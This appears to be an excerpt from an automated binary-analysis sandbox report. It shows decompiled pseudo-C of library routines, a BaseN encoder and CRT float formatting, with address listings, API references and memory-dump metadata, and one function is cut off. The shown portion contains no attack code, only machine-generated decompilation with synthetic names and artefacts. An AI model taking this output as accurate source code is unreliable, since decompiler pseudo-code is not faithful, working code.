                    								} while (_t198 % _t292 != 0);
                    							}
                    							_t193 = _t252;
                    							asm("cdq");
                    							_t194 = _t193 / _t292;
                    							_t215 = _t193 / _t292;
                    							 *(_t302 + 0x24) = _t215;
                    							_t253 =  *(_t302 + 0x38);
                    							_t278 =  *(_t302 + 0x3c);
                    							__eflags = _t253 - _t215;
                    							if(_t253 != _t215) {
                    								_t294 = _t278;
                    								memset(_t294, 0, _t253 << 0);
                    								_t295 = _t294 + _t253;
                    								_t194 = L013CDA60(_t278);
                    								__eflags = _t215;
                    								if(__eflags != 0) {
                    									_t278 = E013CD9F0(0, _t295, __eflags, _t215);
                    								} else {
                    									_t278 = 0;
                    								}
                    							}
                    							 *(_t302 + 0x3c) = _t278;
                    							 *(_t302 + 0x38) = _t215;
                    							 *((intOrPtr*)(_t302 + 0x34)) = 0xffffffff;
                    							 *[fs:0x0] = _v20;
                    							__eflags = _v24 ^ _t311;
                    							return E013F268B(_t194, _v24 ^ _t311);
                    						}
                    					}
                    				} else {
                    					_t280 = _t301;
                    					 *((intOrPtr*)(__ecx + 0x2c)) = 0;
                    					 *((intOrPtr*)(__ecx + 0x28)) = 0;
                    					_t203 = _t280 & 0x80000007;
                    					if(_t203 < 0) {
                    						_t330 = (_t203 - 0x00000001 | 0xfffffff8) + 1;
                    					}
                    					if(_t330 != 0) {
                    						do {
                    							_t280 = _t280 + _t301;
                    							_t268 = _t280 & 0x80000007;
                    							if(_t268 < 0) {
                    								_t332 = (_t268 - 0x00000001 | 0xfffffff8) + 1;
                    							}
                    						} while (_t332 != 0);
                    					}
                    					asm("cdq");
                    					_t205 = _t280 + (_t280 & 0x00000007);
                    					_t308 = _t280 + (_t280 & 0x00000007) >> 3;
                    					 *(_t213 + 0x24) = _t308;
                    					_t261 =  *(_t213 + 0x38);
                    					_t282 =  *(_t213 + 0x3c);
                    					if(_t261 != _t308) {
                    						_t297 = _t282;
                    						memset(_t297, 0, _t261 << 0);
                    						_t298 = _t297 + _t261;
                    						_t205 = L013CDA60(_t282);
                    						if(_t308 != 0) {
                    							_t282 = E013CD9F0(0, _t298, __eflags, _t308);
                    						} else {
                    							_t282 = 0;
                    						}
                    					}
                    					 *(_t213 + 0x3c) = _t282;
                    					 *(_t213 + 0x38) = _t308;
                    					 *((intOrPtr*)(_t213 + 0x34)) = 0xffffffff;
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t205, _v20 ^ _t310);
                    				}
                    			}
































































































                    0x013e8fb3
                    0x013e8fb5
                    0x013e8fc0
                    0x013e8fc1
                    0x013e8fc4
                    0x013e8fc9
                    0x013e8fcb
                    0x013e8fd1
                    0x013e8fd5
                    0x013e8fdb
                    0x013e8fdd
                    0x013e8ff0
                    0x013e8ff5
                    0x013e9005
                    0x013e900a
                    0x013e900e
                    0x013e90c4
                    0x013e90cb
                    0x013e90d2
                    0x013e90d6
                    0x013e90db
                    0x013e90de
                    0x013e90e5
                    0x013e90f1
                    0x013e90f6
                    0x013e90f9
                    0x013e9100
                    0x013e9107
                    0x013e910e
                    0x013e9115
                    0x013e9119
                    0x013e9126
                    0x013e912b
                    0x013e9132
                    0x013e9137
                    0x013e9138
                    0x013e9139
                    0x013e913a
                    0x013e913b
                    0x013e913c
                    0x013e913d
                    0x013e913e
                    0x013e913f
                    0x013e9140
                    0x013e9141
                    0x013e9143
                    0x013e9145
                    0x013e9150
                    0x013e9151
                    0x013e9154
                    0x013e9159
                    0x013e915b
                    0x013e915e
                    0x013e915f
                    0x013e9160
                    0x013e9161
                    0x013e9165
                    0x013e916b
                    0x013e916d
                    0x013e9180
                    0x013e9185
                    0x013e9195
                    0x013e919a
                    0x013e919c
                    0x013e919e
                    0x013e9280
                    0x013e928a
                    0x013e9291
                    0x013e9298
                    0x013e929c
                    0x013e92a1
                    0x013e92a4
                    0x013e92ab
                    0x013e92b7
                    0x013e92bc
                    0x013e92bf
                    0x013e92c6
                    0x013e92cd
                    0x013e92d4
                    0x013e92db
                    0x013e92df
                    0x013e92ec
                    0x013e92f1
                    0x013e92f8
                    0x013e92fd
                    0x013e92fe
                    0x013e92ff
                    0x013e9316
                    0x013e9321
                    0x013e9327
                    0x013e9329
                    0x013e9341
                    0x013e9345
                    0x013e934c
                    0x013e934e
                    0x013e9355
                    0x013e935c
                    0x013e9360
                    0x013e9363
                    0x013e936a
                    0x013e9371
                    0x013e9375
                    0x013e937c
                    0x013e9383
                    0x013e938a
                    0x013e9391
                    0x013e9398
                    0x013e939f
                    0x013e93a3
                    0x013e93a7
                    0x013e93a9
                    0x013e93d4
                    0x013e93ab
                    0x013e93bb
                    0x013e93bb
                    0x013e93e9
                    0x013e93ec
                    0x013e93f0
                    0x013e93fa
                    0x013e93fd
                    0x013e93f2
                    0x013e93f2
                    0x013e93f5
                    0x013e93f5
                    0x013e9405
                    0x013e940a
                    0x013e940e
                    0x013e9418
                    0x013e941b
                    0x013e9410
                    0x013e9410
                    0x013e9413
                    0x013e9413
                    0x013e9423
                    0x013e9428
                    0x013e9435
                    0x013e943b
                    0x013e943f
                    0x013e944a
                    0x013e944c
                    0x013e944e
                    0x013e9459
                    0x013e9464
                    0x013e9467
                    0x013e946e
                    0x013e9471
                    0x013e9473
                    0x013e9475
                    0x013e9480
                    0x013e948d
                    0x013e91a4
                    0x013e91a4
                    0x013e91a7
                    0x00000000
                    0x013e91ad
                    0x013e91c2
                    0x013e91c4
                    0x013e91c6
                    0x013e91ef
                    0x013e91ef
                    0x013e91ef
                    0x013e91c8
                    0x013e91dd
                    0x013e91df
                    0x013e91e1
                    0x013e91e9
                    0x013e91e9
                    0x013e91e3
                    0x013e91e3
                    0x013e91e7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013e91e7
                    0x013e91e1
                    0x013e91f2
                    0x013e91f4
                    0x013e91f9
                    0x013e91fe
                    0x013e9201
                    0x013e9208
                    0x013e920f
                    0x013e9211
                    0x013e9213
                    0x013e9213
                    0x013e9216
                    0x013e9218
                    0x013e921b
                    0x013e921b
                    0x013e9213
                    0x013e921f
                    0x013e9221
                    0x013e9222
                    0x013e9224
                    0x013e9226
                    0x013e9229
                    0x013e922c
                    0x013e922f
                    0x013e9231
                    0x013e9233
                    0x013e9237
                    0x013e9237
                    0x013e923a
                    0x013e9242
                    0x013e9244
                    0x013e9253
                    0x013e9246
                    0x013e9246
                    0x013e9246
                    0x013e9244
                    0x013e9255
                    0x013e9258
                    0x013e925b
                    0x013e9265
                    0x013e9273
                    0x013e927d
                    0x013e927d
                    0x013e91a7
                    0x013e901d
                    0x013e901d
                    0x013e901f
                    0x013e9028
                    0x013e902f
                    0x013e9034
                    0x013e903a
                    0x013e903a
                    0x013e903b
                    0x013e9040
                    0x013e9040
                    0x013e9044
                    0x013e904a
                    0x013e9050
                    0x013e9050
                    0x013e9051
                    0x013e9040
                    0x013e9055
                    0x013e9059
                    0x013e905d
                    0x013e9060
                    0x013e9063
                    0x013e9066
                    0x013e906b
                    0x013e906d
                    0x013e9071
                    0x013e9071
                    0x013e9074
                    0x013e907e
                    0x013e908d
                    0x013e9080
                    0x013e9080
                    0x013e9080
                    0x013e907e
                    0x013e908f
                    0x013e9092
                    0x013e9095
                    0x013e909f
                    0x013e90b7
                    0x013e90b7

                    APIs
                      • Part of subcall function 013E8D30: __CxxThrowException@8.LIBVCRUNTIME ref: 013E8E41
                      • Part of subcall function 013CED50: __CxxThrowException@8.LIBVCRUNTIME ref: 013CEE61
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E9132
                      • Part of subcall function 013CD9F0: __CxxThrowException@8.LIBVCRUNTIME ref: 013CDA54
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E92F8
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                      • Part of subcall function 013E8E70: __CxxThrowException@8.LIBVCRUNTIME ref: 013E8F81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: BaseN_Decoder$BaseN_Decoder: Log2Base must be between 1 and 7 inclusive$BaseN_Encoder$BaseN_Encoder: Log2Base must be between 1 and 7 inclusive$DecodingLookupArray$EncodingLookupArray$GroupSize$Grouper$Log2Base$Pad$PaddingByte$Separator$Terminator
                    • API String ID: 3476068407-2095131268
                    • Opcode ID: fe2eaa6fb0e95ba37236a66e92eea0a65117363986acd958d3bd9ecfe793809a
                    • Instruction ID: 85dd1656f5c2dd8d685e5ecdbb5de54e9f9b280f0b621620203c0150b1a0f6bb
                    • Opcode Fuzzy Hash: fe2eaa6fb0e95ba37236a66e92eea0a65117363986acd958d3bd9ecfe793809a
                    • Instruction Fuzzy Hash: 05E1A1B1A00359ABDF14CF99C898BEEBBF5EF58718F24421DE415AB390D774A904CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E014125AF(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                    				signed int _v0;
                    				signed int _v8;
                    				char _v460;
                    				signed int _v464;
                    				void _v468;
                    				signed int _v472;
                    				signed int _v932;
                    				signed int _v936;
                    				signed int _v1392;
                    				signed int _v1396;
                    				signed int _v1400;
                    				char _v1860;
                    				signed int _v1864;
                    				signed int _v1865;
                    				signed int _v1872;
                    				signed int _v1876;
                    				signed int _v1880;
                    				signed int _v1884;
                    				signed int _v1888;
                    				signed int _v1892;
                    				signed int _v1896;
                    				intOrPtr _v1900;
                    				signed int _v1904;
                    				signed int _v1908;
                    				signed int _v1912;
                    				signed int _v1916;
                    				signed int _v1920;
                    				signed int _v1924;
                    				signed int _v1928;
                    				char _v1936;
                    				char _v1944;
                    				char _v2404;
                    				signed int _v2408;
                    				signed int _v2424;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t725;
                    				signed int _t735;
                    				signed int _t736;
                    				signed int _t740;
                    				intOrPtr _t742;
                    				intOrPtr* _t743;
                    				intOrPtr* _t746;
                    				signed int _t750;
                    				signed int _t751;
                    				signed int _t757;
                    				signed int _t763;
                    				intOrPtr _t765;
                    				void* _t766;
                    				signed int _t767;
                    				signed int _t768;
                    				signed int _t769;
                    				signed int _t777;
                    				signed int _t778;
                    				signed int _t781;
                    				signed int _t782;
                    				signed int _t783;
                    				signed int _t786;
                    				signed int _t787;
                    				signed int _t788;
                    				signed int _t790;
                    				signed int _t791;
                    				signed int _t796;
                    				signed int _t797;
                    				signed int _t802;
                    				signed int _t803;
                    				signed int _t806;
                    				signed int _t810;
                    				signed int _t817;
                    				signed int* _t820;
                    				signed int _t823;
                    				signed int _t834;
                    				signed int _t835;
                    				signed int _t837;
                    				char* _t838;
                    				signed int _t840;
                    				signed int _t844;
                    				signed int _t845;
                    				signed int _t849;
                    				signed int _t851;
                    				signed int _t856;
                    				signed int _t864;
                    				signed int _t867;
                    				signed int _t869;
                    				signed int _t872;
                    				signed int _t873;
                    				signed int _t874;
                    				signed int _t877;
                    				signed int _t890;
                    				signed int _t891;
                    				signed int _t893;
                    				char* _t894;
                    				signed int _t896;
                    				signed int _t900;
                    				signed int _t901;
                    				signed int* _t903;
                    				signed int _t905;
                    				signed int _t907;
                    				signed int _t912;
                    				signed int _t919;
                    				signed int _t922;
                    				signed int _t926;
                    				signed int* _t933;
                    				intOrPtr _t935;
                    				void* _t936;
                    				intOrPtr* _t938;
                    				signed int* _t942;
                    				unsigned int _t953;
                    				signed int _t954;
                    				void* _t957;
                    				signed int _t958;
                    				void* _t960;
                    				signed int _t961;
                    				signed int _t962;
                    				signed int _t963;
                    				signed int _t971;
                    				signed int _t976;
                    				signed int _t979;
                    				unsigned int _t982;
                    				signed int _t983;
                    				void* _t986;
                    				signed int _t987;
                    				void* _t989;
                    				signed int _t990;
                    				signed int _t991;
                    				signed int _t992;
                    				signed int _t996;
                    				signed int* _t1001;
                    				signed int _t1003;
                    				signed int _t1013;
                    				void _t1016;
                    				signed int _t1019;
                    				void* _t1022;
                    				signed int _t1033;
                    				signed int _t1034;
                    				signed int _t1037;
                    				signed int _t1038;
                    				signed int _t1040;
                    				signed int _t1041;
                    				signed int _t1042;
                    				signed int _t1046;
                    				signed int _t1050;
                    				signed int _t1051;
                    				signed int _t1052;
                    				signed int _t1054;
                    				signed int _t1055;
                    				signed int _t1056;
                    				signed int _t1057;
                    				signed int _t1058;
                    				signed int _t1059;
                    				signed int _t1061;
                    				signed int _t1062;
                    				signed int _t1063;
                    				signed int _t1064;
                    				signed int _t1065;
                    				signed int _t1066;
                    				unsigned int _t1067;
                    				void* _t1070;
                    				intOrPtr _t1072;
                    				signed int _t1073;
                    				signed int _t1074;
                    				signed int _t1075;
                    				signed int* _t1079;
                    				void* _t1083;
                    				void* _t1084;
                    				signed int _t1085;
                    				signed int _t1086;
                    				signed int _t1087;
                    				signed int _t1090;
                    				signed int _t1091;
                    				signed int _t1096;
                    				signed int _t1098;
                    				signed int _t1101;
                    				char _t1106;
                    				signed int _t1108;
                    				signed int _t1109;
                    				signed int _t1110;
                    				signed int _t1111;
                    				signed int _t1112;
                    				signed int _t1113;
                    				signed int _t1114;
                    				signed int _t1118;
                    				signed int _t1119;
                    				signed int _t1120;
                    				signed int _t1121;
                    				signed int _t1122;
                    				unsigned int _t1125;
                    				void* _t1129;
                    				void* _t1130;
                    				unsigned int _t1131;
                    				signed int _t1136;
                    				signed int _t1137;
                    				signed int _t1139;
                    				signed int _t1140;
                    				intOrPtr* _t1142;
                    				signed int _t1143;
                    				signed int _t1144;
                    				signed int _t1147;
                    				signed int _t1148;
                    				signed int _t1151;
                    				signed int _t1153;
                    				signed int _t1154;
                    				void* _t1155;
                    				signed int _t1156;
                    				signed int _t1157;
                    				signed int _t1158;
                    				void* _t1161;
                    				signed int _t1162;
                    				signed int _t1163;
                    				signed int _t1164;
                    				signed int _t1165;
                    				signed int _t1166;
                    				signed int* _t1169;
                    				signed int _t1170;
                    				signed int _t1171;
                    				signed int _t1172;
                    				signed int _t1173;
                    				intOrPtr* _t1175;
                    				intOrPtr* _t1176;
                    				signed int _t1178;
                    				signed int _t1180;
                    				signed int _t1183;
                    				signed int _t1189;
                    				signed int _t1193;
                    				signed int _t1194;
                    				intOrPtr _t1196;
                    				intOrPtr _t1197;
                    				signed int _t1202;
                    				signed int _t1205;
                    				signed int _t1206;
                    				signed int _t1207;
                    				signed int _t1208;
                    				signed int _t1209;
                    				signed int _t1210;
                    				signed int _t1212;
                    				signed int _t1213;
                    				signed int _t1214;
                    				signed int _t1215;
                    				signed int _t1217;
                    				signed int _t1218;
                    				signed int _t1219;
                    				signed int _t1220;
                    				signed int _t1221;
                    				signed int _t1223;
                    				signed int _t1224;
                    				signed int _t1226;
                    				signed int _t1228;
                    				signed int _t1230;
                    				signed int _t1232;
                    				signed int* _t1234;
                    				signed int* _t1238;
                    				signed int _t1247;
                    
                    				_t725 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t725 ^ _t1232;
                    				_t1013 = _a20;
                    				_t1142 = _a16;
                    				_v1924 = _t1142;
                    				_v1920 = _t1013;
                    				E01412585( &_v1944, __eflags);
                    				_t1193 = _a8;
                    				_t730 = 0x2d;
                    				if((_t1193 & 0x80000000) == 0) {
                    					_t730 = 0x120;
                    				}
                    				 *_t1142 = _t730;
                    				 *((intOrPtr*)(_t1142 + 8)) = _t1013;
                    				_t1143 = _a4;
                    				if((_t1193 & 0x7ff00000) != 0) {
                    					L5:
                    					_t735 = E0140A8BD( &_a4);
                    					_pop(_t1028);
                    					__eflags = _t735;
                    					if(_t735 != 0) {
                    						_t1028 = _v1924;
                    						 *((intOrPtr*)(_v1924 + 4)) = 1;
                    					}
                    					_t736 = _t735 - 1;
                    					__eflags = _t736;
                    					if(_t736 == 0) {
                    						_push("1#INF");
                    						goto L308;
                    					} else {
                    						_t750 = _t736 - 1;
                    						__eflags = _t750;
                    						if(_t750 == 0) {
                    							_push("1#QNAN");
                    							goto L308;
                    						} else {
                    							_t751 = _t750 - 1;
                    							__eflags = _t751;
                    							if(_t751 == 0) {
                    								_push("1#SNAN");
                    								goto L308;
                    							} else {
                    								__eflags = _t751 == 1;
                    								if(_t751 == 1) {
                    									_push("1#IND");
                    									goto L308;
                    								} else {
                    									_v1928 = _v1928 & 0x00000000;
                    									_a4 = _t1143;
                    									_a8 = _t1193 & 0x7fffffff;
                    									_t1247 = _a4;
                    									asm("fst qword [ebp-0x768]");
                    									_t1147 = _v1896;
                    									_v1916 = _a12 + 1;
                    									_t1033 = _t1147 >> 0x14;
                    									_t757 = _t1033 & 0x000007ff;
                    									__eflags = _t757;
                    									if(_t757 != 0) {
                    										_t1098 = 0;
                    										_t757 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t1098 = 1;
                    									}
                    									_t1148 = _t1147 & 0x000fffff;
                    									_t1016 = _v1900 + _t757;
                    									asm("adc edi, esi");
                    									__eflags = _t1098;
                    									_t1034 = _t1033 & 0x000007ff;
                    									_t1202 = _t1034 - 0x434 + (0 | _t1098 != 0x00000000) + 1;
                    									_v1872 = _t1202;
                    									E01414650(_t1034, _t1247);
                    									_push(_t1034);
                    									_push(_t1034);
                    									 *_t1234 = _t1247;
                    									_t763 = E013F2890(E01414760(), _t1247);
                    									_v1904 = _t763;
                    									__eflags = _t763 - 0x7fffffff;
                    									if(_t763 == 0x7fffffff) {
                    										L16:
                    										__eflags = 0;
                    										_v1904 = 0;
                    									} else {
                    										__eflags = _t763 - 0x80000000;
                    										if(_t763 == 0x80000000) {
                    											goto L16;
                    										}
                    									}
                    									_v468 = _t1016;
                    									__eflags = _t1148;
                    									_v464 = _t1148;
                    									_t1019 = (0 | _t1148 != 0x00000000) + 1;
                    									_v472 = _t1019;
                    									__eflags = _t1202;
                    									if(_t1202 < 0) {
                    										__eflags = _t1202 - 0xfffffc02;
                    										if(_t1202 == 0xfffffc02) {
                    											L101:
                    											_t765 =  *((intOrPtr*)(_t1232 + _t1019 * 4 - 0x1d4));
                    											_t195 =  &_v1896;
                    											 *_t195 = _v1896 & 0x00000000;
                    											__eflags =  *_t195;
                    											asm("bsr eax, eax");
                    											if( *_t195 == 0) {
                    												_t1037 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t1037 = _t765 + 1;
                    											}
                    											_t766 = 0x20;
                    											_t767 = _t766 - _t1037;
                    											__eflags = _t767 - 1;
                    											_t768 = _t767 & 0xffffff00 | _t767 - 0x00000001 > 0x00000000;
                    											__eflags = _t1019 - 0x73;
                    											_v1865 = _t768;
                    											_t1038 = _t1037 & 0xffffff00 | _t1019 - 0x00000073 > 0x00000000;
                    											__eflags = _t1019 - 0x73;
                    											if(_t1019 != 0x73) {
                    												L107:
                    												_t769 = 0;
                    												__eflags = 0;
                    											} else {
                    												__eflags = _t768;
                    												if(_t768 == 0) {
                    													goto L107;
                    												} else {
                    													_t769 = 1;
                    												}
                    											}
                    											__eflags = _t1038;
                    											if(_t1038 != 0) {
                    												L126:
                    												_v1400 = _v1400 & 0x00000000;
                    												_t224 =  &_v472;
                    												 *_t224 = _v472 & 0x00000000;
                    												__eflags =  *_t224;
                    												_push(0);
                    												_push( &_v1396);
                    												_push(0x1cc);
                    												_push( &_v468);
                    												L313();
                    												_t1234 =  &(_t1234[4]);
                    											} else {
                    												__eflags = _t769;
                    												if(_t769 != 0) {
                    													goto L126;
                    												} else {
                    													_t1065 = 0x72;
                    													__eflags = _t1019 - _t1065;
                    													if(_t1019 < _t1065) {
                    														_t1065 = _t1019;
                    													}
                    													__eflags = _t1065 - 0xffffffff;
                    													if(_t1065 != 0xffffffff) {
                    														_t1220 = _t1065;
                    														_t1175 =  &_v468 + _t1065 * 4;
                    														_v1880 = _t1175;
                    														while(1) {
                    															__eflags = _t1220 - _t1019;
                    															if(_t1220 >= _t1019) {
                    																_t208 =  &_v1876;
                    																 *_t208 = _v1876 & 0x00000000;
                    																__eflags =  *_t208;
                    															} else {
                    																_v1876 =  *_t1175;
                    															}
                    															_t210 = _t1220 - 1; // 0x70
                    															__eflags = _t210 - _t1019;
                    															if(_t210 >= _t1019) {
                    																_t1125 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1125 =  *(_t1175 - 4);
                    															}
                    															_t1175 = _t1175 - 4;
                    															_t933 = _v1880;
                    															_t1220 = _t1220 - 1;
                    															 *_t933 = _t1125 >> 0x0000001f ^ _v1876 + _v1876;
                    															_v1880 = _t933 - 4;
                    															__eflags = _t1220 - 0xffffffff;
                    															if(_t1220 == 0xffffffff) {
                    																break;
                    															}
                    															_t1019 = _v472;
                    														}
                    														_t1202 = _v1872;
                    													}
                    													__eflags = _v1865;
                    													if(_v1865 == 0) {
                    														_v472 = _t1065;
                    													} else {
                    														_t218 = _t1065 + 1; // 0x73
                    														_v472 = _t218;
                    													}
                    												}
                    											}
                    											_t1151 = 1 - _t1202;
                    											E013F5890(_t1151,  &_v1396, 0, 1);
                    											__eflags = 1;
                    											 *(_t1232 + 0xbad63d) = 1 << (_t1151 & 0x0000001f);
                    											_t777 = 0xbadbae;
                    										} else {
                    											_v1396 = _v1396 & 0x00000000;
                    											_t1066 = 2;
                    											_v1392 = 0x100000;
                    											_v1400 = _t1066;
                    											__eflags = _t1019 - _t1066;
                    											if(_t1019 == _t1066) {
                    												_t1129 = 0;
                    												__eflags = 0;
                    												while(1) {
                    													_t935 =  *((intOrPtr*)(_t1232 + _t1129 - 0x570));
                    													__eflags = _t935 -  *((intOrPtr*)(_t1232 + _t1129 - 0x1d0));
                    													if(_t935 !=  *((intOrPtr*)(_t1232 + _t1129 - 0x1d0))) {
                    														goto L101;
                    													}
                    													_t1129 = _t1129 + 4;
                    													__eflags = _t1129 - 8;
                    													if(_t1129 != 8) {
                    														continue;
                    													} else {
                    														_t166 =  &_v1896;
                    														 *_t166 = _v1896 & 0x00000000;
                    														__eflags =  *_t166;
                    														asm("bsr eax, edi");
                    														if( *_t166 == 0) {
                    															_t1130 = 0;
                    															__eflags = 0;
                    														} else {
                    															_t1130 = _t935 + 1;
                    														}
                    														_t936 = 0x20;
                    														_t1221 = _t1066;
                    														__eflags = _t936 - _t1130 - _t1066;
                    														_t938 =  &_v460;
                    														_v1880 = _t938;
                    														_t1176 = _t938;
                    														_t171 =  &_v1865;
                    														 *_t171 = _t936 - _t1130 - _t1066 > 0;
                    														__eflags =  *_t171;
                    														while(1) {
                    															__eflags = _t1221 - _t1019;
                    															if(_t1221 >= _t1019) {
                    																_t173 =  &_v1876;
                    																 *_t173 = _v1876 & 0x00000000;
                    																__eflags =  *_t173;
                    															} else {
                    																_v1876 =  *_t1176;
                    															}
                    															_t175 = _t1221 - 1; // 0x0
                    															__eflags = _t175 - _t1019;
                    															if(_t175 >= _t1019) {
                    																_t1131 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1131 =  *(_t1176 - 4);
                    															}
                    															_t1176 = _t1176 - 4;
                    															_t942 = _v1880;
                    															_t1221 = _t1221 - 1;
                    															 *_t942 = _t1131 >> 0x0000001e ^ _v1876 << 0x00000002;
                    															_v1880 = _t942 - 4;
                    															__eflags = _t1221 - 0xffffffff;
                    															if(_t1221 == 0xffffffff) {
                    																break;
                    															}
                    															_t1019 = _v472;
                    														}
                    														__eflags = _v1865;
                    														_t1067 = _t1066 - _v1872;
                    														_v472 = (0 | _v1865 != 0x00000000) + _t1066;
                    														_t1178 = _t1067 >> 5;
                    														_v1884 = _t1067;
                    														_t1223 = _t1178 << 2;
                    														E013F5890(_t1178,  &_v1396, 0, _t1223);
                    														 *(_t1232 + _t1223 - 0x570) = 1 << (_v1884 & 0x0000001f);
                    														_t777 = _t1178 + 1;
                    													}
                    													goto L128;
                    												}
                    											}
                    											goto L101;
                    										}
                    										L128:
                    										_v1400 = _t777;
                    										_t1022 = 0x1cc;
                    										_v936 = _t777;
                    										_t778 = _t777 << 2;
                    										__eflags = _t778;
                    										_push(_t778);
                    										_push( &_v1396);
                    										_push(0x1cc);
                    										_push( &_v932);
                    										L313();
                    										_t1238 =  &(_t1234[7]);
                    									} else {
                    										_v1396 = _v1396 & 0x00000000;
                    										_t1224 = 2;
                    										_v1392 = 0x100000;
                    										_v1400 = _t1224;
                    										__eflags = _t1019 - _t1224;
                    										if(_t1019 != _t1224) {
                    											L53:
                    											_t953 = _v1872 + 1;
                    											_t954 = _t953 & 0x0000001f;
                    											_t1070 = 0x20;
                    											_v1876 = _t954;
                    											_t1180 = _t953 >> 5;
                    											_v1872 = _t1180;
                    											_v1908 = _t1070 - _t954;
                    											_t957 = E013F30E0(1, _t1070 - _t954, 0);
                    											_t1072 =  *((intOrPtr*)(_t1232 + _t1019 * 4 - 0x1d4));
                    											_t958 = _t957 - 1;
                    											_t108 =  &_v1896;
                    											 *_t108 = _v1896 & 0x00000000;
                    											__eflags =  *_t108;
                    											asm("bsr ecx, ecx");
                    											_v1884 = _t958;
                    											_v1912 =  !_t958;
                    											if( *_t108 == 0) {
                    												_t1073 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t1073 = _t1072 + 1;
                    											}
                    											_t960 = 0x20;
                    											_t961 = _t960 - _t1073;
                    											_t1136 = _t1019 + _t1180;
                    											__eflags = _v1876 - _t961;
                    											_v1892 = _t1136;
                    											_t962 = _t961 & 0xffffff00 | _v1876 - _t961 > 0x00000000;
                    											__eflags = _t1136 - 0x73;
                    											_v1865 = _t962;
                    											_t1074 = _t1073 & 0xffffff00 | _t1136 - 0x00000073 > 0x00000000;
                    											__eflags = _t1136 - 0x73;
                    											if(_t1136 != 0x73) {
                    												L59:
                    												_t963 = 0;
                    												__eflags = 0;
                    											} else {
                    												__eflags = _t962;
                    												if(_t962 == 0) {
                    													goto L59;
                    												} else {
                    													_t963 = 1;
                    												}
                    											}
                    											__eflags = _t1074;
                    											if(_t1074 != 0) {
                    												L81:
                    												__eflags = 0;
                    												_t1022 = 0x1cc;
                    												_push(0);
                    												_v1400 = 0;
                    												_v472 = 0;
                    												_push( &_v1396);
                    												_push(0x1cc);
                    												_push( &_v468);
                    												L313();
                    												_t1234 =  &(_t1234[4]);
                    											} else {
                    												__eflags = _t963;
                    												if(_t963 != 0) {
                    													goto L81;
                    												} else {
                    													_t1075 = 0x72;
                    													__eflags = _t1136 - _t1075;
                    													if(_t1136 >= _t1075) {
                    														_t1136 = _t1075;
                    														_v1892 = _t1075;
                    													}
                    													_t971 = _t1136;
                    													_v1880 = _t971;
                    													__eflags = _t1136 - 0xffffffff;
                    													if(_t1136 != 0xffffffff) {
                    														_t1137 = _v1872;
                    														_t1226 = _t1136 - _t1137;
                    														__eflags = _t1226;
                    														_t1079 =  &_v468 + _t1226 * 4;
                    														_v1888 = _t1079;
                    														while(1) {
                    															__eflags = _t971 - _t1137;
                    															if(_t971 < _t1137) {
                    																break;
                    															}
                    															__eflags = _t1226 - _t1019;
                    															if(_t1226 >= _t1019) {
                    																_t1183 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t1183 =  *_t1079;
                    															}
                    															__eflags = _t1226 - 1 - _t1019;
                    															if(_t1226 - 1 >= _t1019) {
                    																_t976 = 0;
                    																__eflags = 0;
                    															} else {
                    																_t976 =  *(_t1079 - 4);
                    															}
                    															_t979 = _v1880;
                    															_t1079 = _v1888 - 4;
                    															_v1888 = _t1079;
                    															 *(_t1232 + _t979 * 4 - 0x1d0) = (_t1183 & _v1884) << _v1876 | (_t976 & _v1912) >> _v1908;
                    															_t971 = _t979 - 1;
                    															_t1226 = _t1226 - 1;
                    															_v1880 = _t971;
                    															__eflags = _t971 - 0xffffffff;
                    															if(_t971 != 0xffffffff) {
                    																_t1019 = _v472;
                    																continue;
                    															}
                    															break;
                    														}
                    														_t1136 = _v1892;
                    														_t1180 = _v1872;
                    														_t1224 = 2;
                    													}
                    													__eflags = _t1180;
                    													if(_t1180 != 0) {
                    														__eflags = 0;
                    														memset( &_v468, 0, _t1180 << 2);
                    														_t1234 =  &(_t1234[3]);
                    													}
                    													__eflags = _v1865;
                    													_t1022 = 0x1cc;
                    													if(_v1865 == 0) {
                    														_v472 = _t1136;
                    													} else {
                    														_v472 = _t1136 + 1;
                    													}
                    												}
                    											}
                    											_v1392 = _v1392 & 0x00000000;
                    											_v1396 = _t1224;
                    											_v1400 = 1;
                    											_v936 = 1;
                    											_push(4);
                    										} else {
                    											_t1083 = 0;
                    											__eflags = 0;
                    											while(1) {
                    												__eflags =  *((intOrPtr*)(_t1232 + _t1083 - 0x570)) -  *((intOrPtr*)(_t1232 + _t1083 - 0x1d0));
                    												if( *((intOrPtr*)(_t1232 + _t1083 - 0x570)) !=  *((intOrPtr*)(_t1232 + _t1083 - 0x1d0))) {
                    													goto L53;
                    												}
                    												_t1083 = _t1083 + 4;
                    												__eflags = _t1083 - 8;
                    												if(_t1083 != 8) {
                    													continue;
                    												} else {
                    													_t982 = _v1872 + 2;
                    													_t983 = _t982 & 0x0000001f;
                    													_t1084 = 0x20;
